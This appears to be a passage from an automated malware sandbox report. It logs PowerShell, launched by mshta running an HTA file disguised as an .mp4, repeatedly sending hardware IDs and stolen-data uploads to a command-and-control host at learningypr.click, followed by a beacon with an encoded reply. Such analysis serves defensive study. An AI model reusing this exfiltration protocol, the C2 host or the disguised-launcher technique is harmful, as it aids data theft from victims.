                                                                                                            2024-12-22 12:44:23 UTC1369INData Raw: 4a 34 2b 4a 70 49 36 77 56 4c 78 4a 31 34 4e 65 35 79 41 54 4f 36 4a 79 4f 59 70 2b 76 6a 51 51 55 2b 56 45 39 4c 73 74 73 7a 30 30 34 4a 50 31 6b 73 34 79 2b 77 53 5a 6e 78 6d 70 63 52 52 32 38 47 39 2f 30 56 48 39 4f 32 35 53 6a 41 72 72 2b 6d 50 6a 42 54 76 50 6e 75 4f 4f 34 55 48 4a 43 5a 43 51 43 4b 39 74 57 42 6d 7a 63 54 58 4a 4a 76 31 31 62 6a 57 51 42 4c 4f 2b 4b 75 4e 6f 61 4a 50 4c 73 63 75 6e 58 4c 77 59 32 59 68 65 71 53 41 4d 61 76 34 67 4c 63 6b 77 2f 54 51 74 66 39 42 4d 38 4b 77 34 35 41 34 47 35 49 66 6e 69 50 59 50 30 44 6d 38 6e 52 69 34 65 6c 4d 2b 6c 6b 42 2f 78 79 69 79 4d 33 5a 55 67 67 4b 7a 68 58 58 6a 4b 48 69 5a 30 4e 47 62 2f 67 4c 70 45 59 62 63 4f 36 68 6a 52 44 36 7a 49 48 48 4a 62 76 30 72 66 69 4f 43 54 75 4c 36 59 2f 4e
                                                                                                            Data Ascii: J4+JpI6wVLxJ14Ne5yATO6JyOYp+vjQQU+VE9Lstsz004JP1ks4y+wSZnxmpcRR28G9/0VH9O25SjArr+mPjBTvPnuOO4UHJCZCQCK9tWBmzcTXJJv11bjWQBLO+KuNoaJPLscunXLwY2YheqSAMav4gLckw/TQtf9BM8Kw45A4G5IfniPYP0Dm8nRi4elM+lkB/xyiyM3ZUggKzhXXjKHiZ0NGb/gLpEYbcO6hjRD6zIHHJbv0rfiOCTuL6Y/N


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.650009104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:25 UTC278OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=HB1VYCV10Q0DS
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 12828
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:25 UTC12828OUTData Raw: 2d 2d 48 42 31 56 59 43 56 31 30 51 30 44 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35 0d 0a 2d 2d 48 42 31 56 59 43 56 31 30 51 30 44 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 42 31 56 59 43 56 31 30 51 30 44 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 48 42 31 56 59 43 56 31 30 51 30 44
                                                                                                            Data Ascii: --HB1VYCV10Q0DSContent-Disposition: form-data; name="hwid"0EE013A557B0AD72809032466F38DC95--HB1VYCV10Q0DSContent-Disposition: form-data; name="pid"2--HB1VYCV10Q0DSContent-Disposition: form-data; name="lid"jMw1IE--bigJ--HB1VYCV10Q0D
                                                                                                            2024-12-22 12:44:26 UTC1141INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:25 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=oi69h8vmv7a49auq04sht0ngaa; expires=Thu, 17 Apr 2025 06:31:04 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgwSoe6SnSDVPjrz6Vikm%2FF%2F7pNiRasSyAV7cxC2jOS5ltxC7vf2vk5HrRNu7zg7%2FZbJ52pf%2FGSzuKUVOJj4uy1%2FhjXYIuhIPWBh4qDhCU0sgPS%2BxCBEy9C%2BsfscvtNsfVLIdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f603401ea46c323-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1468&rtt_var=558&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13764&delivery_rate=1945369&cwnd=214&unsent_bytes=0&cid=a55daecfbf2d8342&ts=1018&x=0"
                                                                                                            2024-12-22 12:44:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-22 12:44:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.650010104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:27 UTC282OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=6NTLDMUFCLZKFZZ6B
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15098
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:27 UTC15098OUTData Raw: 2d 2d 36 4e 54 4c 44 4d 55 46 43 4c 5a 4b 46 5a 5a 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35 0d 0a 2d 2d 36 4e 54 4c 44 4d 55 46 43 4c 5a 4b 46 5a 5a 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4e 54 4c 44 4d 55 46 43 4c 5a 4b 46 5a 5a 36 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d
                                                                                                            Data Ascii: --6NTLDMUFCLZKFZZ6BContent-Disposition: form-data; name="hwid"0EE013A557B0AD72809032466F38DC95--6NTLDMUFCLZKFZZ6BContent-Disposition: form-data; name="pid"2--6NTLDMUFCLZKFZZ6BContent-Disposition: form-data; name="lid"jMw1IE--bigJ--
                                                                                                            2024-12-22 12:44:28 UTC1131INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:28 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=02on2ies6a897ot6962fukmiq0; expires=Thu, 17 Apr 2025 06:31:06 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g1RAC6mWT065sUyZy686X0Zpd2WFhea01GQQ5LD4NmZ1%2F7nQeUNwBLgJTijpwx8enaAHput0dhUIuPSEm3qQjEcX%2BKmabPakskwcw3qUYEAgUwwpkUTqqxIqnBVSaACASmzxzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6034105afbc461-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1626&rtt_var=617&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16038&delivery_rate=1795817&cwnd=228&unsent_bytes=0&cid=75347b461e80bdea&ts=914&x=0"
                                                                                                            2024-12-22 12:44:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-22 12:44:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.650011104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:29 UTC283OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=RX2ZQDW2W0NV1DWJ16
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 19962
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:29 UTC15331OUTData Raw: 2d 2d 52 58 32 5a 51 44 57 32 57 30 4e 56 31 44 57 4a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35 0d 0a 2d 2d 52 58 32 5a 51 44 57 32 57 30 4e 56 31 44 57 4a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 58 32 5a 51 44 57 32 57 30 4e 56 31 44 57 4a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d
                                                                                                            Data Ascii: --RX2ZQDW2W0NV1DWJ16Content-Disposition: form-data; name="hwid"0EE013A557B0AD72809032466F38DC95--RX2ZQDW2W0NV1DWJ16Content-Disposition: form-data; name="pid"3--RX2ZQDW2W0NV1DWJ16Content-Disposition: form-data; name="lid"jMw1IE--bigJ
                                                                                                            2024-12-22 12:44:29 UTC4631OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8
                                                                                                            Data Ascii: +?2+?2+?o?Mp5p_
                                                                                                            2024-12-22 12:44:30 UTC1131INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:30 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=ro0njho8r9c07u39q234moln57; expires=Thu, 17 Apr 2025 06:31:09 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XCVFy92mteHWQcDgnWwzhRYwiJ%2FUjdTucki0%2F3OdqeNYzxoOQv1TqlcOQdOGl5QcrNjw6oVHtBvQx9EjI11RbbEPNhaHXwwV5d4PdYS9QXm39whbqDe1z5XbtuaEX6NUTWrrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f60341e9d428c15-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1810&rtt_var=681&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2842&recv_bytes=20925&delivery_rate=1613259&cwnd=238&unsent_bytes=0&cid=e3bd7532461994bc&ts=964&x=0"
                                                                                                            2024-12-22 12:44:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-22 12:44:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.650012104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:32 UTC280OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=LZAQH4UM7XDWG9ZN
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1207
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:32 UTC1207OUTData Raw: 2d 2d 4c 5a 41 51 48 34 55 4d 37 58 44 57 47 39 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35 0d 0a 2d 2d 4c 5a 41 51 48 34 55 4d 37 58 44 57 47 39 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 5a 41 51 48 34 55 4d 37 58 44 57 47 39 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 4c 5a 41
                                                                                                            Data Ascii: --LZAQH4UM7XDWG9ZNContent-Disposition: form-data; name="hwid"0EE013A557B0AD72809032466F38DC95--LZAQH4UM7XDWG9ZNContent-Disposition: form-data; name="pid"1--LZAQH4UM7XDWG9ZNContent-Disposition: form-data; name="lid"jMw1IE--bigJ--LZA
                                                                                                            2024-12-22 12:44:32 UTC1132INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:32 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=2b5i10s3b032i8bt7h93ts9ji2; expires=Thu, 17 Apr 2025 06:31:11 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=watG42xSpo%2FEZSE4u8RGkonUY2KGCvGGEIKCCD%2BjgFrYBU1kxw%2Fv3rih9TQFhOFQGs8rkwqMKlV4DwWZnmoM46agG6Z7Cx6dAkUrA9cs6qyXID6Dt6UZCfr3crKML8cD9Aas%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f60342e69df43be-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1560&rtt_var=883&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2123&delivery_rate=1060661&cwnd=226&unsent_bytes=0&cid=2eb9f62266eade3c&ts=808&x=0"
                                                                                                            2024-12-22 12:44:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-22 12:44:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.650014104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:34 UTC281OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=SQ9O8JPI4MPQCKNB2
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1122
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:34 UTC1122OUTData Raw: 2d 2d 53 51 39 4f 38 4a 50 49 34 4d 50 51 43 4b 4e 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35 0d 0a 2d 2d 53 51 39 4f 38 4a 50 49 34 4d 50 51 43 4b 4e 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 51 39 4f 38 4a 50 49 34 4d 50 51 43 4b 4e 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d
                                                                                                            Data Ascii: --SQ9O8JPI4MPQCKNB2Content-Disposition: form-data; name="hwid"0EE013A557B0AD72809032466F38DC95--SQ9O8JPI4MPQCKNB2Content-Disposition: form-data; name="pid"1--SQ9O8JPI4MPQCKNB2Content-Disposition: form-data; name="lid"jMw1IE--bigJ--
                                                                                                            2024-12-22 12:44:35 UTC1134INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=vdnsh2efe667uvu3pvfd0ctv01; expires=Thu, 17 Apr 2025 06:31:13 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ftgJaD53JDjne8fDuXGllGyLcShVFnn%2B%2FQAWOOAkZqELXS21UuZsmDFOlMzy0iSvTR%2B0S5kj%2BDUweY0ymh9qxOx0jGVv9GDIEq77WWQRTe730nkRSDQhlgW4Fwr%2Bg9VA7DM7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f60343b6e218c15-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1767&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2039&delivery_rate=1525600&cwnd=238&unsent_bytes=0&cid=fde7779649a4df1f&ts=811&x=0"
                                                                                                            2024-12-22 12:44:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-22 12:44:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.650015104.21.48.14431208C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-22 12:44:36 UTC266OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 113
                                                                                                            Host: learningypr.click
                                                                                                            2024-12-22 12:44:36 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 30 45 45 30 31 33 41 35 35 37 42 30 41 44 37 32 38 30 39 30 33 32 34 36 36 46 33 38 44 43 39 35
                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=0EE013A557B0AD72809032466F38DC95
                                                                                                            2024-12-22 12:44:37 UTC1132INHTTP/1.1 200 OK
                                                                                                            Date: Sun, 22 Dec 2024 12:44:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=ec9pj3m03f07eetiuj41kpncue; expires=Thu, 17 Apr 2025 06:31:15 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nSSJMMtdYZlcFPZEm2issBHMdyYRaKty72W81oiecQjHDvfVCUf5R%2BPDuhg%2BZdfGl9V9rE%2F7uSINpsOqn36strtXkSX1Gy4Xxlw0rqFDLnMyBwkAlUhOfFQxJ%2BypxJf9tXjUTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f603448ee6dc323-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1451&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1015&delivery_rate=1881443&cwnd=214&unsent_bytes=0&cid=9865b6bc4a1d2668&ts=759&x=0"
                                                                                                            2024-12-22 12:44:37 UTC146INData Raw: 38 63 0d 0a 65 78 78 6f 50 72 6d 41 79 6c 37 6e 67 50 2b 58 45 30 76 35 36 73 4a 34 66 4c 77 67 47 4c 6e 33 4c 39 31 47 34 77 52 43 69 4f 59 67 5a 30 70 4c 6d 37 72 6f 4e 70 50 30 6a 2b 51 70 46 39 61 32 37 52 4d 51 31 56 42 37 32 49 4e 4b 72 53 2b 57 4e 47 7a 37 6a 68 52 73 4e 42 48 51 37 72 34 42 68 4f 79 50 79 48 38 76 69 37 57 78 45 42 32 53 56 47 44 4e 31 51 50 2f 49 4a 63 6d 65 4c 72 4b 57 58 6c 4b 42 49 6a 39 6c 77 3d 3d 0d 0a
                                                                                                            Data Ascii: 8cexxoPrmAyl7ngP+XE0v56sJ4fLwgGLn3L91G4wRCiOYgZ0pLm7roNpP0j+QpF9a27RMQ1VB72INKrS+WNGz7jhRsNBHQ7r4BhOyPyH8vi7WxEB2SVGDN1QP/IJcmeLrKWXlKBIj9lw==
                                                                                                            2024-12-22 12:44:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:07:42:05
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\winwidgetshp.mp4.hta"
                                                                                                            Imagebase:0xe60000
                                                                                                            File size:13'312 bytes
                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:4
